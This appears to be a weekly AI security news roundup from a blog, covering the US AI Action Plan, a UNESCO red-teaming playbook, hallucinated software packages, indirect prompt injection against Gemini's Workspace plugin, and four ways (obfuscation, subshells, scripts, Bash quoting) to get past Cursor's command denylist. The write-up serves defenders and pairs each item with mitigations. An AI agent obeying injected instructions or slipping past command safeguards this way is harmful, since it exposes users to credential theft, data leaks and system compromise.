Towards Secure AI Week 29 — America’s AI Action Plan, LLM Plugin Flaws, and Package Hallucination Risks

Trusted AI Blog ADMIN July 28, 2025 100

From insecure plugins to hallucinated packages, this week’s AI security landscape exposes the fragile trust surface of generative and agentic systems.

New research reveals that leading LLMs frequently invent fake software dependencies, creating a dangerous supply chain vulnerability, while Google’s Gemini plugin fell prey to indirect prompt injection capable of full session compromise. Meanwhile, UNESCO and the White House push forward new governance tools—offering both community-driven AI Red Teaming frameworks and national-level AI infrastructure policies. And as agentic coding tools like Cursor race ahead, flawed safeguards show how easily shell access can slip past superficial controls.

The message is clear: as AI systems grow more autonomous, security must evolve beyond static filters and into proactive validation, governance, and AI Red Teaming at scale.

White House Unveils America’s AI Action Plan

The White House, July 23, 2025

The U.S. government has announced a comprehensive strategy to consolidate global AI leadership through deregulation, infrastructure expansion, and export of AI technologies—shaping future implications for security, geopolitics, and procurement.

The plan details over 90 federal policy actions across three pillars: innovation acceleration, AI infrastructure, and global diplomatic and security leadership. Highlights include: fast-tracking data center and chip fab development; removing federal regulatory burdens on AI deployment; requiring ideological neutrality in frontier LLMs used in federal procurement; and launching full-stack AI export packages in collaboration with U.S. industry partners. The plan positions AI as central to economic strength, national security, and technological sovereignty. For a full breakdown of AI-specific security implications, see America’s AI Action Plan — Top AI Security Insights.

How to deal with it:

Monitor federal procurement changes to assess how new neutrality requirements could affect approved LLM vendors.
Track the impact of expedited infrastructure initiatives (e.g., data centers, fabs) on secure AI system deployment timelines.
Assess how global AI export packages may shape international AI security norms and supply chain trust models.

New UNESCO Playbook Helps Communities Red Team AI for Social Good

Global Teacher Prize, July 23, 2025

This initiative provides a structured way for communities to test AI systems for bias and harm, especially around gender-based violence.

UNESCO, in collaboration with Dr. Rumman Chowdhury and Humane Intelligence, published a AI Red Teaming Playbook aimed at civil society, educators, and policymakers. The resource is based on a live AI Red Teaming exercise and offers hands-on methods for identifying stereotypes, exclusion, and safety issues in generative AI systems. It emphasizes community participation in evaluating AI risks and promotes inclusive, transparent development practices.

How to deal with it:

Use the Playbook to design AI Red Teaming sessions that explore AI bias and social impact in educational or advocacy settings.
Apply the methods to assess risks in generative AI tools related to gender, equity, and public sector use.
Incorporate AI Red Teaming findings into broader AI governance and ethical review frameworks.

LLM-Created “Package Hallucinations” Pose New Software Supply Chain Risk

I-hls, July 22, 2025

This study highlights a novel vulnerability where AI-generated code introduces fake package names, exposing software supply chains to malicious exploitation.

Researchers from three U.S. universities analyzed over 576,000 code samples from 16 LLMs and discovered that models frequently hallucinate non-existent software packages during code generation. Commercial tools like GPT-4 and Claude showed hallucination rates above 5%, while some open-source models exceeded 20%. Attackers could register these fake package names in public repositories, leading unsuspecting developers to import malicious code.

How to deal with it:

Require developers to verify all AI-suggested dependencies before importing them into projects.
Monitor public repositories for suspicious uploads of hallucinated package names.
Integrate automated validation and allowlist checks into software development pipelines using AI.

LLM plugin vulnerabilities highlight growing threat to AI ecosystems

SC Media, July 25, 2025

Vulnerabilities in plugins expose LLM-based systems to prompt injection, data leaks, and full session compromise—posing risks not just to models but to their surrounding infrastructure.

HiddenLayer discovered that Google’s Gemini Pro and Ultra, when used with the Workspace plugin, could be tricked into leaking hidden prompts and even prompting users for passwords via indirect prompt injection. These flaws illustrate systemic design issues in how LLM plugins process unvalidated inputs, particularly when integrated with external tools like vector databases or SQL filters. Experts warn that such plugins often rely on insecure APIs and lack granular validation, creating high-risk pathways for attackers.

How to deal with it:

Enforce strict input validation and avoid accepting freeform or user-generated code in plugins.
Design plugins using least-privilege principles and bind plugin actions to authenticated identities with scoped tokens.
Incorporate OWASP ASVS controls and test all plugins with static, dynamic, and red-teaming techniques during development.

Cursor’s Denylist Exposes the Risks of Agentic AI

Information Security Buzz, July 22, 2025

This incident reveals how agentic AI systems can silently bypass weak safeguards and execute malicious commands—putting developer environments at risk.

Cursor, an AI-powered coding tool, uses a denylist to block unsafe commands during auto-run execution. However, Backslash Research found four methods to bypass these protections using obfuscation, subshells, scripts, and Bash quoting tricks. These flaws allow agents to execute arbitrary commands, rendering the denylist ineffective and exposing users to malware, key exfiltration, and system compromise. Cursor confirmed the issue and plans to deprecate the denylist in a future release.

How to deal with it:

Disable auto-run features in agentic tools unless allowlist-based controls are enforced.
Avoid relying on denylists as primary defenses; use fine-grained permissioning and shell restrictions.
Add external monitoring tools to detect hidden payloads, script-based execution paths, and prompt injection attempts.

For more expert breakdowns, visit our Trusted AI Blog or follow us on LinkedIn to stay up to date with the latest in AI security. Be the first to learn about emerging risks, tools, and defense strategies.

Subscribe for updates

Stay up to date with what is happening! Plus, get a first look at news, noteworthy research, and the worst attacks on AI—delivered right to your inbox.